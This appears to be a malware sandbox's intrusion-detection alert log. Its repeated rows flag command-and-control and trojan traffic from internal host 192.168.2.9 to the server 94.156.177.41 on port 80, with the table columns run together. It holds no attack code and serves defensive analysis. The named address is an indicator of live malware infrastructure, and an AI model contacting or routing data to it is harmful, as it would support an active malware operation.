                2025-01-11T08:38:59.655514+010020253811Malware Command and Control Activity Detected192.168.2.95009294.156.177.4180TCP
                2025-01-11T08:39:00.512250+010020253811Malware Command and Control Activity Detected192.168.2.95009394.156.177.4180TCP
                2025-01-11T08:39:01.365444+010020253811Malware Command and Control Activity Detected192.168.2.95009494.156.177.4180TCP
                2025-01-11T08:39:02.473916+010020253811Malware Command and Control Activity Detected192.168.2.95009594.156.177.4180TCP
                2025-01-11T08:39:03.353242+010020253811Malware Command and Control Activity Detected192.168.2.95009694.156.177.4180TCP
                2025-01-11T08:39:04.211638+010020253811Malware Command and Control Activity Detected192.168.2.95009794.156.177.4180TCP
                2025-01-11T08:39:05.111899+010020253811Malware Command and Control Activity Detected192.168.2.95009894.156.177.4180TCP
                2025-01-11T08:39:06.002182+010020253811Malware Command and Control Activity Detected192.168.2.95009994.156.177.4180TCP
                2025-01-11T08:39:06.979552+010020253811Malware Command and Control Activity Detected192.168.2.95010094.156.177.4180TCP
                2025-01-11T08:39:07.899333+010020253811Malware Command and Control Activity Detected192.168.2.95010194.156.177.4180TCP
                2025-01-11T08:39:08.814632+010020253811Malware Command and Control Activity Detected192.168.2.95010294.156.177.4180TCP
                2025-01-11T08:39:09.685224+010020253811Malware Command and Control Activity Detected192.168.2.95010394.156.177.4180TCP
                2025-01-11T08:39:10.558443+010020253811Malware Command and Control Activity Detected192.168.2.95010494.156.177.4180TCP
                2025-01-11T08:39:11.462948+010020253811Malware Command and Control Activity Detected192.168.2.95010594.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T08:37:20.138790+010020243131Malware Command and Control Activity Detected192.168.2.94981794.156.177.4180TCP
                2025-01-11T08:37:21.015453+010020243131Malware Command and Control Activity Detected192.168.2.94982894.156.177.4180TCP
                2025-01-11T08:37:22.060608+010020243131Malware Command and Control Activity Detected192.168.2.94983494.156.177.4180TCP
                2025-01-11T08:37:22.934799+010020243131Malware Command and Control Activity Detected192.168.2.94984194.156.177.4180TCP
                2025-01-11T08:37:23.790840+010020243131Malware Command and Control Activity Detected192.168.2.94984894.156.177.4180TCP
                2025-01-11T08:37:24.850077+010020243131Malware Command and Control Activity Detected192.168.2.94985494.156.177.4180TCP
                2025-01-11T08:37:25.749213+010020243131Malware Command and Control Activity Detected192.168.2.94986494.156.177.4180TCP
                2025-01-11T08:37:26.588548+010020243131Malware Command and Control Activity Detected192.168.2.94987094.156.177.4180TCP
                2025-01-11T08:37:27.478445+010020243131Malware Command and Control Activity Detected192.168.2.94987694.156.177.4180TCP
                2025-01-11T08:37:28.381899+010020243131Malware Command and Control Activity Detected192.168.2.94988294.156.177.4180TCP
                2025-01-11T08:37:29.254495+010020243131Malware Command and Control Activity Detected192.168.2.94988894.156.177.4180TCP
                2025-01-11T08:37:30.159633+010020243131Malware Command and Control Activity Detected192.168.2.94989594.156.177.4180TCP
                2025-01-11T08:37:31.068873+010020243131Malware Command and Control Activity Detected192.168.2.94990494.156.177.4180TCP
                2025-01-11T08:37:31.960696+010020243131Malware Command and Control Activity Detected192.168.2.94991194.156.177.4180TCP
                2025-01-11T08:37:32.876960+010020243131Malware Command and Control Activity Detected192.168.2.94991794.156.177.4180TCP
                2025-01-11T08:37:33.740539+010020243131Malware Command and Control Activity Detected192.168.2.94992394.156.177.4180TCP
                2025-01-11T08:37:34.614693+010020243131Malware Command and Control Activity Detected192.168.2.94992994.156.177.4180TCP
                2025-01-11T08:37:35.493079+010020243131Malware Command and Control Activity Detected192.168.2.94993894.156.177.4180TCP
                2025-01-11T08:37:36.377601+010020243131Malware Command and Control Activity Detected192.168.2.94994694.156.177.4180TCP
                2025-01-11T08:37:37.256341+010020243131Malware Command and Control Activity Detected192.168.2.94995294.156.177.4180TCP
                2025-01-11T08:37:38.126336+010020243131Malware Command and Control Activity Detected192.168.2.94995894.156.177.4180TCP
                2025-01-11T08:37:39.132869+010020243131Malware Command and Control Activity Detected192.168.2.94996494.156.177.4180TCP
                2025-01-11T08:37:39.989261+010020243131Malware Command and Control Activity Detected192.168.2.94997294.156.177.4180TCP
                2025-01-11T08:37:40.867627+010020243131Malware Command and Control Activity Detected192.168.2.94998094.156.177.4180TCP
                2025-01-11T08:37:41.715847+010020243131Malware Command and Control Activity Detected192.168.2.94998794.156.177.4180TCP
                2025-01-11T08:37:42.601897+010020243131Malware Command and Control Activity Detected192.168.2.94999394.156.177.4180TCP
                2025-01-11T08:37:43.489590+010020243131Malware Command and Control Activity Detected192.168.2.94999994.156.177.4180TCP
                2025-01-11T08:37:44.355553+010020243131Malware Command and Control Activity Detected192.168.2.95000694.156.177.4180TCP
                2025-01-11T08:37:45.204506+010020243131Malware Command and Control Activity Detected192.168.2.95000994.156.177.4180TCP
                2025-01-11T08:37:46.087106+010020243131Malware Command and Control Activity Detected192.168.2.95001094.156.177.4180TCP
                2025-01-11T08:37:46.977754+010020243131Malware Command and Control Activity Detected192.168.2.95001194.156.177.4180TCP
                2025-01-11T08:37:47.837286+010020243131Malware Command and Control Activity Detected192.168.2.95001294.156.177.4180TCP
                2025-01-11T08:37:48.699029+010020243131Malware Command and Control Activity Detected192.168.2.95001394.156.177.4180TCP
                2025-01-11T08:37:49.557629+010020243131Malware Command and Control Activity Detected192.168.2.95001494.156.177.4180TCP
                2025-01-11T08:37:50.432462+010020243131Malware Command and Control Activity Detected192.168.2.95001594.156.177.4180TCP
                2025-01-11T08:37:51.359900+010020243131Malware Command and Control Activity Detected192.168.2.95001694.156.177.4180TCP
                2025-01-11T08:37:52.255722+010020243131Malware Command and Control Activity Detected192.168.2.95001794.156.177.4180TCP
                2025-01-11T08:37:53.124263+010020243131Malware Command and Control Activity Detected192.168.2.95001894.156.177.4180TCP
                2025-01-11T08:37:54.003233+010020243131Malware Command and Control Activity Detected192.168.2.95001994.156.177.4180TCP
                2025-01-11T08:37:54.850099+010020243131Malware Command and Control Activity Detected192.168.2.95002094.156.177.4180TCP
                2025-01-11T08:37:56.132335+010020243131Malware Command and Control Activity Detected192.168.2.95002194.156.177.4180TCP
                2025-01-11T08:37:57.013035+010020243131Malware Command and Control Activity Detected192.168.2.95002294.156.177.4180TCP
                2025-01-11T08:37:57.903370+010020243131Malware Command and Control Activity Detected192.168.2.95002394.156.177.4180TCP
                2025-01-11T08:37:58.830433+010020243131Malware Command and Control Activity Detected192.168.2.95002494.156.177.4180TCP
                2025-01-11T08:37:59.712910+010020243131Malware Command and Control Activity Detected192.168.2.95002594.156.177.4180TCP
                2025-01-11T08:38:00.754871+010020243131Malware Command and Control Activity Detected192.168.2.95002794.156.177.4180TCP
                2025-01-11T08:38:01.623270+010020243131Malware Command and Control Activity Detected192.168.2.95002894.156.177.4180TCP
                2025-01-11T08:38:02.493986+010020243131Malware Command and Control Activity Detected192.168.2.95002994.156.177.4180TCP
                2025-01-11T08:38:03.624137+010020243131Malware Command and Control Activity Detected192.168.2.95003094.156.177.4180TCP
                2025-01-11T08:38:04.490753+010020243131Malware Command and Control Activity Detected192.168.2.95003194.156.177.4180TCP
                2025-01-11T08:38:05.395008+010020243131Malware Command and Control Activity Detected192.168.2.95003294.156.177.4180TCP
                2025-01-11T08:38:06.454721+010020243131Malware Command and Control Activity Detected192.168.2.95003394.156.177.4180TCP
                2025-01-11T08:38:07.370753+010020243131Malware Command and Control Activity Detected192.168.2.95003494.156.177.4180TCP
                2025-01-11T08:38:08.253891+010020243131Malware Command and Control Activity Detected192.168.2.95003594.156.177.4180TCP
                2025-01-11T08:38:09.255787+010020243131Malware Command and Control Activity Detected192.168.2.95003694.156.177.4180TCP
                2025-01-11T08:38:10.138394+010020243131Malware Command and Control Activity Detected192.168.2.95003794.156.177.4180TCP
                2025-01-11T08:38:11.003703+010020243131Malware Command and Control Activity Detected192.168.2.95003894.156.177.4180TCP
                2025-01-11T08:38:11.883164+010020243131Malware Command and Control Activity Detected192.168.2.95003994.156.177.4180TCP
                2025-01-11T08:38:12.778136+010020243131Malware Command and Control Activity Detected192.168.2.95004094.156.177.4180TCP
                2025-01-11T08:38:13.686751+010020243131Malware Command and Control Activity Detected192.168.2.95004194.156.177.4180TCP
                2025-01-11T08:38:14.556486+010020243131Malware Command and Control Activity Detected192.168.2.95004294.156.177.4180TCP
                2025-01-11T08:38:15.572731+010020243131Malware Command and Control Activity Detected192.168.2.95004394.156.177.4180TCP
                2025-01-11T08:38:16.449634+010020243131Malware Command and Control Activity Detected192.168.2.95004494.156.177.4180TCP
                2025-01-11T08:38:17.326715+010020243131Malware Command and Control Activity Detected192.168.2.95004594.156.177.4180TCP
                2025-01-11T08:38:18.200103+010020243131Malware Command and Control Activity Detected192.168.2.95004694.156.177.4180TCP
                2025-01-11T08:38:19.084044+010020243131Malware Command and Control Activity Detected192.168.2.95004794.156.177.4180TCP
                2025-01-11T08:38:19.943174+010020243131Malware Command and Control Activity Detected192.168.2.95004894.156.177.4180TCP
                2025-01-11T08:38:20.836464+010020243131Malware Command and Control Activity Detected192.168.2.95004994.156.177.4180TCP
                2025-01-11T08:38:22.072417+010020243131Malware Command and Control Activity Detected192.168.2.95005094.156.177.4180TCP
                2025-01-11T08:38:22.938811+010020243131Malware Command and Control Activity Detected192.168.2.95005194.156.177.4180TCP
                2025-01-11T08:38:23.775451+010020243131Malware Command and Control Activity Detected192.168.2.95005294.156.177.4180TCP
                2025-01-11T08:38:24.924940+010020243131Malware Command and Control Activity Detected192.168.2.95005394.156.177.4180TCP
                2025-01-11T08:38:25.792727+010020243131Malware Command and Control Activity Detected192.168.2.95005494.156.177.4180TCP
                2025-01-11T08:38:26.667801+010020243131Malware Command and Control Activity Detected192.168.2.95005594.156.177.4180TCP
                2025-01-11T08:38:27.819161+010020243131Malware Command and Control Activity Detected192.168.2.95005694.156.177.4180TCP
                2025-01-11T08:38:28.682413+010020243131Malware Command and Control Activity Detected192.168.2.95005794.156.177.4180TCP
                2025-01-11T08:38:29.679562+010020243131Malware Command and Control Activity Detected192.168.2.95005894.156.177.4180TCP
                2025-01-11T08:38:30.528984+010020243131Malware Command and Control Activity Detected192.168.2.95005994.156.177.4180TCP
                2025-01-11T08:38:31.418232+010020243131Malware Command and Control Activity Detected192.168.2.95006094.156.177.4180TCP
                2025-01-11T08:38:32.294702+010020243131Malware Command and Control Activity Detected192.168.2.95006194.156.177.4180TCP
                2025-01-11T08:38:33.203940+010020243131Malware Command and Control Activity Detected192.168.2.95006294.156.177.4180TCP
                2025-01-11T08:38:34.375337+010020243131Malware Command and Control Activity Detected192.168.2.95006394.156.177.4180TCP
                2025-01-11T08:38:35.360232+010020243131Malware Command and Control Activity Detected192.168.2.95006494.156.177.4180TCP
                2025-01-11T08:38:36.209960+010020243131Malware Command and Control Activity Detected192.168.2.95006594.156.177.4180TCP
                2025-01-11T08:38:37.179276+010020243131Malware Command and Control Activity Detected192.168.2.95006694.156.177.4180TCP
                2025-01-11T08:38:38.042783+010020243131Malware Command and Control Activity Detected192.168.2.95006794.156.177.4180TCP
                2025-01-11T08:38:38.912153+010020243131Malware Command and Control Activity Detected192.168.2.95006894.156.177.4180TCP
                2025-01-11T08:38:39.956976+010020243131Malware Command and Control Activity Detected192.168.2.95006994.156.177.4180TCP
                2025-01-11T08:38:40.858919+010020243131Malware Command and Control Activity Detected192.168.2.95007094.156.177.4180TCP
                2025-01-11T08:38:41.746972+010020243131Malware Command and Control Activity Detected192.168.2.95007194.156.177.4180TCP
                2025-01-11T08:38:42.661261+010020243131Malware Command and Control Activity Detected192.168.2.95007294.156.177.4180TCP
                2025-01-11T08:38:43.538124+010020243131Malware Command and Control Activity Detected192.168.2.95007394.156.177.4180TCP
                2025-01-11T08:38:44.418883+010020243131Malware Command and Control Activity Detected192.168.2.95007494.156.177.4180TCP
                2025-01-11T08:38:45.460503+010020243131Malware Command and Control Activity Detected192.168.2.95007594.156.177.4180TCP
                2025-01-11T08:38:46.349034+010020243131Malware Command and Control Activity Detected192.168.2.95007694.156.177.4180TCP
                2025-01-11T08:38:47.254357+010020243131Malware Command and Control Activity Detected192.168.2.95007794.156.177.4180TCP
                2025-01-11T08:38:48.123391+010020243131Malware Command and Control Activity Detected192.168.2.95007894.156.177.4180TCP
                2025-01-11T08:38:48.972039+010020243131Malware Command and Control Activity Detected192.168.2.95007994.156.177.4180TCP
                2025-01-11T08:38:49.816159+010020243131Malware Command and Control Activity Detected192.168.2.95008094.156.177.4180TCP
                2025-01-11T08:38:50.672196+010020243131Malware Command and Control Activity Detected192.168.2.95008194.156.177.4180TCP
                2025-01-11T08:38:51.546237+010020243131Malware Command and Control Activity Detected192.168.2.95008294.156.177.4180TCP
                2025-01-11T08:38:52.407655+010020243131Malware Command and Control Activity Detected192.168.2.95008394.156.177.4180TCP
                2025-01-11T08:38:53.255014+010020243131Malware Command and Control Activity Detected192.168.2.95008494.156.177.4180TCP
                2025-01-11T08:38:54.122050+010020243131Malware Command and Control Activity Detected192.168.2.95008594.156.177.4180TCP
                2025-01-11T08:38:54.976683+010020243131Malware Command and Control Activity Detected192.168.2.95008694.156.177.4180TCP
                2025-01-11T08:38:55.873721+010020243131Malware Command and Control Activity Detected192.168.2.95008794.156.177.4180TCP
                2025-01-11T08:38:56.740058+010020243131Malware Command and Control Activity Detected192.168.2.95008894.156.177.4180TCP
                2025-01-11T08:38:57.718537+010020243131Malware Command and Control Activity Detected192.168.2.95008994.156.177.4180TCP
                2025-01-11T08:38:58.557574+010020243131Malware Command and Control Activity Detected192.168.2.95009094.156.177.4180TCP
                2025-01-11T08:38:59.435116+010020243131Malware Command and Control Activity Detected192.168.2.95009194.156.177.4180TCP
                2025-01-11T08:39:00.362103+010020243131Malware Command and Control Activity Detected192.168.2.95009294.156.177.4180TCP
                2025-01-11T08:39:01.205421+010020243131Malware Command and Control Activity Detected192.168.2.95009394.156.177.4180TCP
                2025-01-11T08:39:02.212934+010020243131Malware Command and Control Activity Detected192.168.2.95009494.156.177.4180TCP
                2025-01-11T08:39:03.191625+010020243131Malware Command and Control Activity Detected192.168.2.95009594.156.177.4180TCP
                2025-01-11T08:39:04.061459+010020243131Malware Command and Control Activity Detected192.168.2.95009694.156.177.4180TCP
                2025-01-11T08:39:04.924708+010020243131Malware Command and Control Activity Detected192.168.2.95009794.156.177.4180TCP
                2025-01-11T08:39:05.834626+010020243131Malware Command and Control Activity Detected192.168.2.95009894.156.177.4180TCP
                2025-01-11T08:39:06.824285+010020243131Malware Command and Control Activity Detected192.168.2.95009994.156.177.4180TCP
                2025-01-11T08:39:07.710239+010020243131Malware Command and Control Activity Detected192.168.2.95010094.156.177.4180TCP
                2025-01-11T08:39:08.598891+010020243131Malware Command and Control Activity Detected192.168.2.95010194.156.177.4180TCP
                2025-01-11T08:39:09.507655+010020243131Malware Command and Control Activity Detected192.168.2.95010294.156.177.4180TCP
                2025-01-11T08:39:10.394621+010020243131Malware Command and Control Activity Detected192.168.2.95010394.156.177.4180TCP
                2025-01-11T08:39:11.312423+010020243131Malware Command and Control Activity Detected192.168.2.95010494.156.177.4180TCP
                2025-01-11T08:39:12.212304+010020243131Malware Command and Control Activity Detected192.168.2.95010594.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T08:37:17.283199+010020216411A Network Trojan was detected192.168.2.94980494.156.177.4180TCP
                2025-01-11T08:37:18.596493+010020216411A Network Trojan was detected192.168.2.94981194.156.177.4180TCP
                2025-01-11T08:37:19.430625+010020216411A Network Trojan was detected192.168.2.94981794.156.177.4180TCP
                2025-01-11T08:37:20.295163+010020216411A Network Trojan was detected192.168.2.94982894.156.177.4180TCP
                2025-01-11T08:37:21.333703+010020216411A Network Trojan was detected192.168.2.94983494.156.177.4180TCP
                2025-01-11T08:37:22.217012+010020216411A Network Trojan was detected192.168.2.94984194.156.177.4180TCP
                2025-01-11T08:37:23.102371+010020216411A Network Trojan was detected192.168.2.94984894.156.177.4180TCP
                2025-01-11T08:37:24.122123+010020216411A Network Trojan was detected192.168.2.94985494.156.177.4180TCP
                2025-01-11T08:37:25.027858+010020216411A Network Trojan was detected192.168.2.94986494.156.177.4180TCP
                2025-01-11T08:37:25.900548+010020216411A Network Trojan was detected192.168.2.94987094.156.177.4180TCP
                2025-01-11T08:37:26.766848+010020216411A Network Trojan was detected192.168.2.94987694.156.177.4180TCP
                2025-01-11T08:37:27.644318+010020216411A Network Trojan was detected192.168.2.94988294.156.177.4180TCP
                2025-01-11T08:37:28.555245+010020216411A Network Trojan was detected192.168.2.94988894.156.177.4180TCP
                2025-01-11T08:37:29.427877+010020216411A Network Trojan was detected192.168.2.94989594.156.177.4180TCP
                2025-01-11T08:37:30.321553+010020216411A Network Trojan was detected192.168.2.94990494.156.177.4180TCP
                2025-01-11T08:37:31.243472+010020216411A Network Trojan was detected192.168.2.94991194.156.177.4180TCP
                2025-01-11T08:37:32.132348+010020216411A Network Trojan was detected192.168.2.94991794.156.177.4180TCP
                2025-01-11T08:37:33.035370+010020216411A Network Trojan was detected192.168.2.94992394.156.177.4180TCP
                2025-01-11T08:37:33.901353+010020216411A Network Trojan was detected192.168.2.94992994.156.177.4180TCP
                2025-01-11T08:37:34.780300+010020216411A Network Trojan was detected192.168.2.94993894.156.177.4180TCP
                2025-01-11T08:37:35.656565+010020216411A Network Trojan was detected192.168.2.94994694.156.177.4180TCP
                2025-01-11T08:37:36.542434+010020216411A Network Trojan was detected192.168.2.94995294.156.177.4180TCP
                2025-01-11T08:37:37.413981+010020216411A Network Trojan was detected192.168.2.94995894.156.177.4180TCP
                2025-01-11T08:37:38.278632+010020216411A Network Trojan was detected192.168.2.94996494.156.177.4180TCP
                2025-01-11T08:37:39.298255+010020216411A Network Trojan was detected192.168.2.94997294.156.177.4180TCP
                2025-01-11T08:37:40.160259+010020216411A Network Trojan was detected192.168.2.94998094.156.177.4180TCP
                2025-01-11T08:37:41.027625+010020216411A Network Trojan was detected192.168.2.94998794.156.177.4180TCP
                2025-01-11T08:37:41.877046+010020216411A Network Trojan was detected192.168.2.94999394.156.177.4180TCP
                2025-01-11T08:37:42.766186+010020216411A Network Trojan was detected192.168.2.94999994.156.177.4180TCP
                2025-01-11T08:37:43.647766+010020216411A Network Trojan was detected192.168.2.95000694.156.177.4180TCP
                2025-01-11T08:37:44.509809+010020216411A Network Trojan was detected192.168.2.95000994.156.177.4180TCP
                2025-01-11T08:37:45.351886+010020216411A Network Trojan was detected192.168.2.95001094.156.177.4180TCP
                2025-01-11T08:37:46.247938+010020216411A Network Trojan was detected192.168.2.95001194.156.177.4180TCP
                2025-01-11T08:37:47.141186+010020216411A Network Trojan was detected192.168.2.95001294.156.177.4180TCP
                2025-01-11T08:37:47.993044+010020216411A Network Trojan was detected192.168.2.95001394.156.177.4180TCP
                2025-01-11T08:37:48.851758+010020216411A Network Trojan was detected192.168.2.95001494.156.177.4180TCP
                2025-01-11T08:37:49.710358+010020216411A Network Trojan was detected192.168.2.95001594.156.177.4180TCP
                2025-01-11T08:37:50.589002+010020216411A Network Trojan was detected192.168.2.95001694.156.177.4180TCP
                2025-01-11T08:37:51.533742+010020216411A Network Trojan was detected192.168.2.95001794.156.177.4180TCP
                2025-01-11T08:37:52.420648+010020216411A Network Trojan was detected192.168.2.95001894.156.177.4180TCP
                2025-01-11T08:37:53.281289+010020216411A Network Trojan was detected192.168.2.95001994.156.177.4180TCP
                2025-01-11T08:37:54.149795+010020216411A Network Trojan was detected192.168.2.95002094.156.177.4180TCP
                2025-01-11T08:37:55.447402+010020216411A Network Trojan was detected192.168.2.95002194.156.177.4180TCP
                2025-01-11T08:37:56.296589+010020216411A Network Trojan was detected192.168.2.95002294.156.177.4180TCP
                2025-01-11T08:37:57.168024+010020216411A Network Trojan was detected192.168.2.95002394.156.177.4180TCP
                2025-01-11T08:37:58.108290+010020216411A Network Trojan was detected192.168.2.95002494.156.177.4180TCP
                2025-01-11T08:37:58.997732+010020216411A Network Trojan was detected192.168.2.95002594.156.177.4180TCP
                2025-01-11T08:37:59.881352+010020216411A Network Trojan was detected192.168.2.95002794.156.177.4180TCP
                2025-01-11T08:38:00.923865+010020216411A Network Trojan was detected192.168.2.95002894.156.177.4180TCP
                2025-01-11T08:38:01.801642+010020216411A Network Trojan was detected192.168.2.95002994.156.177.4180TCP
                2025-01-11T08:38:02.929554+010020216411A Network Trojan was detected192.168.2.95003094.156.177.4180TCP
                2025-01-11T08:38:03.788440+010020216411A Network Trojan was detected192.168.2.95003194.156.177.4180TCP
                2025-01-11T08:38:04.654751+010020216411A Network Trojan was detected192.168.2.95003294.156.177.4180TCP
                2025-01-11T08:38:05.736766+010020216411A Network Trojan was detected192.168.2.95003394.156.177.4180TCP
                2025-01-11T08:38:06.637553+010020216411A Network Trojan was detected192.168.2.95003494.156.177.4180TCP
                2025-01-11T08:38:07.543493+010020216411A Network Trojan was detected192.168.2.95003594.156.177.4180TCP
                2025-01-11T08:38:08.535138+010020216411A Network Trojan was detected192.168.2.95003694.156.177.4180TCP
                2025-01-11T08:38:09.430836+010020216411A Network Trojan was detected192.168.2.95003794.156.177.4180TCP
                2025-01-11T08:38:10.296978+010020216411A Network Trojan was detected192.168.2.95003894.156.177.4180TCP
                2025-01-11T08:38:11.151744+010020216411A Network Trojan was detected192.168.2.95003994.156.177.4180TCP
                2025-01-11T08:38:12.040089+010020216411A Network Trojan was detected192.168.2.95004094.156.177.4180TCP
                2025-01-11T08:38:12.949663+010020216411A Network Trojan was detected192.168.2.95004194.156.177.4180TCP
                2025-01-11T08:38:13.842179+010020216411A Network Trojan was detected192.168.2.95004294.156.177.4180TCP
                2025-01-11T08:38:14.714006+010020216411A Network Trojan was detected192.168.2.95004394.156.177.4180TCP
                2025-01-11T08:38:15.727832+010020216411A Network Trojan was detected192.168.2.95004494.156.177.4180TCP
                2025-01-11T08:38:16.602139+010020216411A Network Trojan was detected192.168.2.95004594.156.177.4180TCP
                2025-01-11T08:38:17.480431+010020216411A Network Trojan was detected192.168.2.95004694.156.177.4180TCP
                2025-01-11T08:38:18.361971+010020216411A Network Trojan was detected192.168.2.95004794.156.177.4180TCP
                2025-01-11T08:38:19.243600+010020216411A Network Trojan was detected192.168.2.95004894.156.177.4180TCP
                2025-01-11T08:38:20.125882+010020216411A Network Trojan was detected192.168.2.95004994.156.177.4180TCP
                2025-01-11T08:38:21.374944+010020216411A Network Trojan was detected192.168.2.95005094.156.177.4180TCP
                2025-01-11T08:38:22.229791+010020216411A Network Trojan was detected192.168.2.95005194.156.177.4180TCP
                2025-01-11T08:38:23.088593+010020216411A Network Trojan was detected192.168.2.95005294.156.177.4180TCP
                2025-01-11T08:38:24.220880+010020216411A Network Trojan was detected192.168.2.95005394.156.177.4180TCP
                2025-01-11T08:38:25.073323+010020216411A Network Trojan was detected192.168.2.95005494.156.177.4180TCP
                2025-01-11T08:38:25.957719+010020216411A Network Trojan was detected192.168.2.95005594.156.177.4180TCP
                2025-01-11T08:38:26.972510+010020216411A Network Trojan was detected192.168.2.95005694.156.177.4180TCP
                2025-01-11T08:38:27.976208+010020216411A Network Trojan was detected192.168.2.95005794.156.177.4180TCP
                2025-01-11T08:38:28.837379+010020216411A Network Trojan was detected192.168.2.95005894.156.177.4180TCP
                2025-01-11T08:38:29.840822+010020216411A Network Trojan was detected192.168.2.95005994.156.177.4180TCP
                2025-01-11T08:38:30.693073+010020216411A Network Trojan was detected192.168.2.95006094.156.177.4180TCP
                2025-01-11T08:38:31.577126+010020216411A Network Trojan was detected192.168.2.95006194.156.177.4180TCP
                2025-01-11T08:38:32.460501+010020216411A Network Trojan was detected192.168.2.95006294.156.177.4180TCP
                2025-01-11T08:38:33.646503+010020216411A Network Trojan was detected192.168.2.95006394.156.177.4180TCP
                2025-01-11T08:38:34.530472+010020216411A Network Trojan was detected192.168.2.95006494.156.177.4180TCP
                2025-01-11T08:38:35.510279+010020216411A Network Trojan was detected192.168.2.95006594.156.177.4180TCP
                2025-01-11T08:38:36.471295+010020216411A Network Trojan was detected192.168.2.95006694.156.177.4180TCP
                2025-01-11T08:38:37.336378+010020216411A Network Trojan was detected192.168.2.95006794.156.177.4180TCP
                2025-01-11T08:38:38.202393+010020216411A Network Trojan was detected192.168.2.95006894.156.177.4180TCP
                2025-01-11T08:38:39.238877+010020216411A Network Trojan was detected192.168.2.95006994.156.177.4180TCP
                2025-01-11T08:38:40.130128+010020216411A Network Trojan was detected192.168.2.95007094.156.177.4180TCP
                2025-01-11T08:38:41.012348+010020216411A Network Trojan was detected192.168.2.95007194.156.177.4180TCP
                2025-01-11T08:38:41.968094+010020216411A Network Trojan was detected192.168.2.95007294.156.177.4180TCP
                2025-01-11T08:38:42.823353+010020216411A Network Trojan was detected192.168.2.95007394.156.177.4180TCP
                2025-01-11T08:38:43.698121+010020216411A Network Trojan was detected192.168.2.95007494.156.177.4180TCP
                2025-01-11T08:38:44.595801+010020216411A Network Trojan was detected192.168.2.95007594.156.177.4180TCP
                2025-01-11T08:38:45.627870+010020216411A Network Trojan was detected192.168.2.95007694.156.177.4180TCP
                2025-01-11T08:38:46.516711+010020216411A Network Trojan was detected192.168.2.95007794.156.177.4180TCP
                2025-01-11T08:38:47.424671+010020216411A Network Trojan was detected192.168.2.95007894.156.177.4180TCP
                2025-01-11T08:38:48.273476+010020216411A Network Trojan was detected192.168.2.95007994.156.177.4180TCP
                2025-01-11T08:38:49.116902+010020216411A Network Trojan was detected192.168.2.95008094.156.177.4180TCP
                2025-01-11T08:38:49.960016+010020216411A Network Trojan was detected192.168.2.95008194.156.177.4180TCP
                2025-01-11T08:38:50.825321+010020216411A Network Trojan was detected192.168.2.95008294.156.177.4180TCP
                2025-01-11T08:38:51.695758+010020216411A Network Trojan was detected192.168.2.95008394.156.177.4180TCP
                2025-01-11T08:38:52.555444+010020216411A Network Trojan was detected192.168.2.95008494.156.177.4180TCP
                2025-01-11T08:38:53.414347+010020216411A Network Trojan was detected192.168.2.95008594.156.177.4180TCP
                2025-01-11T08:38:54.273813+010020216411A Network Trojan was detected192.168.2.95008694.156.177.4180TCP
                2025-01-11T08:38:55.134435+010020216411A Network Trojan was detected192.168.2.95008794.156.177.4180TCP
                2025-01-11T08:38:56.036472+010020216411A Network Trojan was detected192.168.2.95008894.156.177.4180TCP
                2025-01-11T08:38:56.987645+010020216411A Network Trojan was detected192.168.2.95008994.156.177.4180TCP
                2025-01-11T08:38:57.870196+010020216411A Network Trojan was detected192.168.2.95009094.156.177.4180TCP
                2025-01-11T08:38:58.710492+010020216411A Network Trojan was detected192.168.2.95009194.156.177.4180TCP
                2025-01-11T08:38:59.655514+010020216411A Network Trojan was detected192.168.2.95009294.156.177.4180TCP
                2025-01-11T08:39:00.512250+010020216411A Network Trojan was detected192.168.2.95009394.156.177.4180TCP
                2025-01-11T08:39:01.365444+010020216411A Network Trojan was detected192.168.2.95009494.156.177.4180TCP
                2025-01-11T08:39:02.473916+010020216411A Network Trojan was detected192.168.2.95009594.156.177.4180TCP
                2025-01-11T08:39:03.353242+010020216411A Network Trojan was detected192.168.2.95009694.156.177.4180TCP
                2025-01-11T08:39:04.211638+010020216411A Network Trojan was detected192.168.2.95009794.156.177.4180TCP
                2025-01-11T08:39:05.111899+010020216411A Network Trojan was detected192.168.2.95009894.156.177.4180TCP
                2025-01-11T08:39:06.002182+010020216411A Network Trojan was detected192.168.2.95009994.156.177.4180TCP
                2025-01-11T08:39:06.979552+010020216411A Network Trojan was detected192.168.2.95010094.156.177.4180TCP
                2025-01-11T08:39:07.899333+010020216411A Network Trojan was detected192.168.2.95010194.156.177.4180TCP
                2025-01-11T08:39:08.814632+010020216411A Network Trojan was detected192.168.2.95010294.156.177.4180TCP
                2025-01-11T08:39:09.685224+010020216411A Network Trojan was detected192.168.2.95010394.156.177.4180TCP
                2025-01-11T08:39:10.558443+010020216411A Network Trojan was detected192.168.2.95010494.156.177.4180TCP
                2025-01-11T08:39:11.462948+010020216411A Network Trojan was detected192.168.2.95010594.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T08:37:17.283199+010028257661Malware Command and Control Activity Detected192.168.2.94980494.156.177.4180TCP
                2025-01-11T08:37:18.596493+010028257661Malware Command and Control Activity Detected192.168.2.94981194.156.177.4180TCP
                2025-01-11T08:37:19.430625+010028257661Malware Command and Control Activity Detected192.168.2.94981794.156.177.4180TCP
                2025-01-11T08:37:20.295163+010028257661Malware Command and Control Activity Detected192.168.2.94982894.156.177.4180TCP
                2025-01-11T08:37:21.333703+010028257661Malware Command and Control Activity Detected192.168.2.94983494.156.177.4180TCP
                2025-01-11T08:37:22.217012+010028257661Malware Command and Control Activity Detected192.168.2.94984194.156.177.4180TCP
                2025-01-11T08:37:23.102371+010028257661Malware Command and Control Activity Detected192.168.2.94984894.156.177.4180TCP
                2025-01-11T08:37:24.122123+010028257661Malware Command and Control Activity Detected192.168.2.94985494.156.177.4180TCP
                2025-01-11T08:37:25.027858+010028257661Malware Command and Control Activity Detected192.168.2.94986494.156.177.4180TCP
                2025-01-11T08:37:25.900548+010028257661Malware Command and Control Activity Detected192.168.2.94987094.156.177.4180TCP
                2025-01-11T08:37:26.766848+010028257661Malware Command and Control Activity Detected192.168.2.94987694.156.177.4180TCP
                2025-01-11T08:37:27.644318+010028257661Malware Command and Control Activity Detected192.168.2.94988294.156.177.4180TCP
                2025-01-11T08:37:28.555245+010028257661Malware Command and Control Activity Detected192.168.2.94988894.156.177.4180TCP
                2025-01-11T08:37:29.427877+010028257661Malware Command and Control Activity Detected192.168.2.94989594.156.177.4180TCP
                2025-01-11T08:37:30.321553+010028257661Malware Command and Control Activity Detected192.168.2.94990494.156.177.4180TCP
